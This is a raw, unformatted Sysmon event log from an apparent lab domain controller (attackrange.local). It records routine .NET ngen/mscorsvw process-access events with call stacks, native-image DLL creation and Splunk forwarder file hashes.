21:06:35.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:35.041{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:35.041{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25B-60D3-E204-00000000CF01}6776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022134Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.619{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA51CB89AAFB01C3C7D2C03D817F2683,SHA256=7B8C1E878C71B03F2D5C1F50175E7031259C5F7C37E462427727B026A86E63E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022133Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.525{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022132Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.510{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022131Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:36.510{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022130Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:36.416{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022129Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.400{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:36.400{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25C-60D3-E604-00000000CF01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:36.275{4DB9351A-A25B-60D3-E504-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15b8-0\System.Windows.Controls.Ribbon.dll2021-06-23 21:06:36.275 23542300x800000000000000022126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:36.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EDBD25B31FB886D1E665E2545902E2E,SHA256=C08917DF3184F039A626200D1AE9F9F2A23798850E209E6E4652BCBB847EE73D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022136Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:37.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFEBD078DB95D2DD07F9731F3A411E09,SHA256=F776E4092F2847B4801BDFD7C3205607E879691170941B9CC91E3B17E24AB6C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022135Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:37.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FDBDF87B965D68309E06EDC369B6C5,SHA256=A98DCAC6BBA07D59017044CF27B199A39B507BFCF075A53C352016BFFEBE37BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.978{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.963{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022153Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.963{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EC04-00000000CF01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022152Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.916{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1898-0\System.Windows.Input.Manipulations.dll2021-06-23 21:06:38.916 10341000x800000000000000022151Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.807{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022150Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.807{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022149Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.807{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EB04-00000000CF01}6296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022148Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.760{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022147Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.744{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022146Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.744{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-EA04-00000000CF01}5912C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000022145Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.697{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D48152854AB964FAE27DDEE944A8641,SHA256=3250D5CDAED4AF97EBD5904F9CA581592C64700EA69671FE92D2D64AE162F2D3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022144Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.666{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\efc-0\System.Windows.Forms.DataVisualization.Design.dll2021-06-23 21:06:38.666 10341000x800000000000000022143Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.510{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022142Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.494{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022141Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 